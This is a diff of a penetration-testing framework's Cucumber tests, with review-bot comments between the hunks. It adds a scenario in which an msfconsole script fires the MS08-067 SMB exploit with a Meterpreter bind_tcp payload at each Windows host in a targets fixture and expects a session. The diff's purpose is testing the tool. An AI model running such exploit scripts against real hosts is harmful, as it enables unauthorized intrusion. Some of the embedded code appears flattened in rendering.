diff --git a/config/cucumber.yml b/config/cucumber.yml
index e3de143513..8cfb5f1a74 100644
--- a/config/cucumber.yml
+++ b/config/cucumber.yml
@@ -6,5 +6,6 @@ ignored_tags = "--tags ~@boot --tags ~@targets"
 %>
 default: <%= std_opts %> <%= ignored_tags %> features
 boot: <%= std_opts %> --tags @boot features
+exploit: <%= std_opts %> --tags @targets features
 wip: --tags @wip:3 --wip features
-rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip
+rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip
\ No newline at end of file
diff --git a/features/modules/exploit/smb/ms08_067_netapi.feature b/features/modules/exploit/smb/ms08_067_netapi.feature
index e23730be1c..9a9cf04ddf 100644
--- a/features/modules/exploit/smb/ms08_067_netapi.feature
+++ b/features/modules/exploit/smb/ms08_067_netapi.feature
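Review bot: The `rerun:` line is shown as removed and re-added with identical text; the only change is the dropped trailing newline (`\ No newline at end of file`), which will keep reappearing as noise in every future diff of this file, so restore the newline before merging. The new `exploit:` profile selects `--tags @targets`, whereas `boot:` selects `@boot`; naming the profile after its tag (or the tag after the profile) keeps profile, tag and rake task easy to match up. The profile otherwise reads consistently with `ignored_tags`, which already excludes `@targets` from `default:`.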
@@ -1,181 +1,26 @@ -@wip +@targets Feature: MS08-067 netapi Background: Given a directory named "home" And I cd to "home" And a mocked home directory - Given I run `msfconsole` interactively - And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp" - Scenario: The MS08-067 Module should have the following options - When I type "use exploit/windows/smb/ms08_067_netapi" - And I type "show options" - And I type "exit" - Then the output should contain: + Scenario: The MS08-067 should get a session with bind_tcp + Given I ready the windows targets + And a file named "ms08-067.rc" with: """ - Module options (exploit/windows/smb/ms08_067_netapi): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - RHOST yes The target address - RPORT 445 yes Set the SMB service port - SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) - - - Exploit target: - - Id Name - -- ---- - 0 Automatic Targeting - + + hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml') + self.run_single('use exploit/windows/smb/ms08_067_netapi') + self.run_single('set payload windows/meterpreter/bind_tcp') + hosts['windows'].each do |host| + self.run_single("set RHOST #{host['ip']}") + self.run_single('run') + sleep 1 + end + + """ - - Scenario: The MS08-067 Module should have the following advanced options - When I type "use exploit/windows/smb/ms08_067_netapi" - And I type "show advanced" - And I type "exit" - Then the output should contain: - """ - Module advanced options: - - Name : CHOST - Current Setting: - Description : The local client address - - Name : CPORT - Current Setting: - Description : The local client port - - Name : ConnectTimeout - Current Setting: 10 - Description : Maximum number of seconds to establish a TCP connection - - Name : ContextInformationFile - Current Setting: - Description : The information file that contains context information - - Name : DCERPC::ReadTimeout - Current Setting: 
10 - Description : The number of seconds to wait for DCERPC responses - - Name : DisablePayloadHandler - Current Setting: false - Description : Disable the handler code for the selected payload - - Name : EnableContextEncoding - Current Setting: false - Description : Use transient context when encoding payloads - - Name : NTLM::SendLM - Current Setting: true - Description : Always send the LANMAN response (except when NTLMv2_session is - specified) - - Name : NTLM::SendNTLM - Current Setting: true - Description : Activate the 'Negotiate NTLM key' flag, indicating the use of - NTLM responses - - Name : NTLM::SendSPN - Current Setting: true - Description : Send an avp of type SPN in the ntlmv2 client Blob, this allow - authentification on windows Seven/2008r2 when SPN is required - - Name : NTLM::UseLMKey - Current Setting: false - Description : Activate the 'Negotiate Lan Manager Key' flag, using the LM key - when the LM response is sent - - Name : NTLM::UseNTLM2_session - Current Setting: true - Description : Activate the 'Negotiate NTLM2 key' flag, forcing the use of a - NTLMv2_session - - Name : NTLM::UseNTLMv2 - Current Setting: true - Description : Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key - is true - - Name : Proxies - Current Setting: - Description : A proxy chain of format type:host:port[,type:host:port][...] 
- - Name : SMB::ChunkSize - Current Setting: 500 - Description : The chunk size for SMB segments, bigger values will increase - speed but break NT 4.0 and SMB signing - - Name : SMB::Native_LM - Current Setting: Windows 2000 5.0 - Description : The Native LM to send during authentication - - Name : SMB::Native_OS - Current Setting: Windows 2000 2195 - Description : The Native OS to send during authentication - - Name : SMB::VerifySignature - Current Setting: false - Description : Enforces client-side verification of server response signatures - - Name : SMBDirect - Current Setting: true - Description : The target port is a raw SMB service (not NetBIOS) - - Name : SMBDomain - Current Setting: . - Description : The Windows domain to use for authentication - - Name : SMBName - Current Setting: *SMBSERVER - Description : The NetBIOS hostname (required for port 139 connections) - - Name : SMBPass - Current Setting: - Description : The password for the specified username - - Name : SMBUser - Current Setting: - Description : The username to authenticate as - - Name : SSL - Current Setting: false - Description : Negotiate SSL for outgoing connections - - Name : SSLCipher - Current Setting: - Description : String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH" - - Name : SSLVerifyMode - Current Setting: PEER - Description : SSL verification method (Accepted: CLIENT_ONCE, - FAIL_IF_NO_PEER_CERT, NONE, PEER) - - Name : SSLVersion - Current Setting: SSL3 - Description : Specify the version of SSL that should be used (Accepted: SSL2, - SSL3, TLS1) - - Name : VERBOSE - Current Setting: false - Description : Enable detailed status messages - - Name : WORKSPACE - Current Setting: - Description : Specify the workspace for this module - - Name : WfsDelay - Current Setting: 0 - Description : Additional delay when waiting for a session - """ - - @targets - Scenario: Show RHOST/etc variable expansion from a config file - When I type "use exploit/windows/smb/ms08_067_netapi" - When RHOST 
is WINDOWS
- And I type "set PAYLOAD windows/meterpreter/bind_tcp"
- And I type "show options"
- And I type "run"
- And I type "exit"
- And I type "exit"
- Then the output should match /spider-wxp/
+ When I run `msfconsole --environment test -q -r ms08-067.rc -x exit`
+ Then the output should contain "[*] Exploit completed, 1 session was created."
diff --git a/features/support/targets.yml.example b/features/support/targets.yml.example
index 75f4b9915d..0752a6cc7e 100644
--- a/features/support/targets.yml.example
+++ b/features/support/targets.yml.example
@@ -1,2 +1,7 @@
-WINDOWS: spider-wxp.vuln.lax.rapid7.com
-LINUX: spider-ubuntu.vuln.lax.rapid7.com
+windows:
+ - hostname: wxpsp0 ip: 127.0.0.100
+ - hostname: wxpsp2 ip: 127.0.0.101
diff --git a/lib/tasks/custom_cucumber.rake b/lib/tasks/custom_cucumber.rake
index 3dab9d0697..9b8c3fb8ae 100644
--- a/lib/tasks/custom_cucumber.rake
+++ b/lib/tasks/custom_cucumber.rake
@@ -12,6 +12,12 @@ begin
 t.fork = true # You may get faster startup if you set this to false
 t.profile = 'boot'
 end
+ Cucumber::Rake::Task.new({:exploit => 'db:test:prepare'}, 'Run features that should pass') do |t|
+ t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
+ t.fork = true # You may get faster startup if you set this to false
+ t.profile = 'exploit'
+ end
+
 end
 rescue LoadError
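Review bot: `hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')` in the added ms08-067.rc opens the fixture without a block, so the File handle is never closed, and `YAML.load` will instantiate whatever Ruby objects the file names; `hosts = YAML.load_file(Rails.root.join('features', 'support', 'targets.yml'))` closes the handle, and `YAML.safe_load` on the file's contents is preferable where the bundled Psych offers it, since the fixture only needs string keys (`windows`, `ip`) and plain scalars. The fixture is developer-supplied, so exposure is low, but this feature will be the template other `@targets` scenarios copy. The scenario also iterates every `windows` entry in the fixture while the expectation `[*] Exploit completed, 1 session was created.` is checked only once, and `sleep 1` is a fixed delay rather than a wait on the session, so with the two hosts in targets.yml.example the assertion is only weakly tied to which host produced the line and the timing is host-dependent. The rc file's embedded Ruby appears to have lost its block delimiters in this rendering, so the snippet is read by intent rather than literally.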
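Review bot: The description `'Run features that should pass'` on the new `:exploit` task does not describe what the task does — it reads as copied from a sibling task — and it is the text `rake -T` shows; something like `'Run @targets features against the hosts listed in features/support/targets.yml'` would tell a developer that this run reaches configured hosts over the network rather than being an ordinary local run. The rake task, the cucumber profile and the tag are named `exploit`, `exploit` and `@targets` respectively; using one name for all three saves a trip to config/cucumber.yml to find out what actually runs. The enclosing block starts before this hunk.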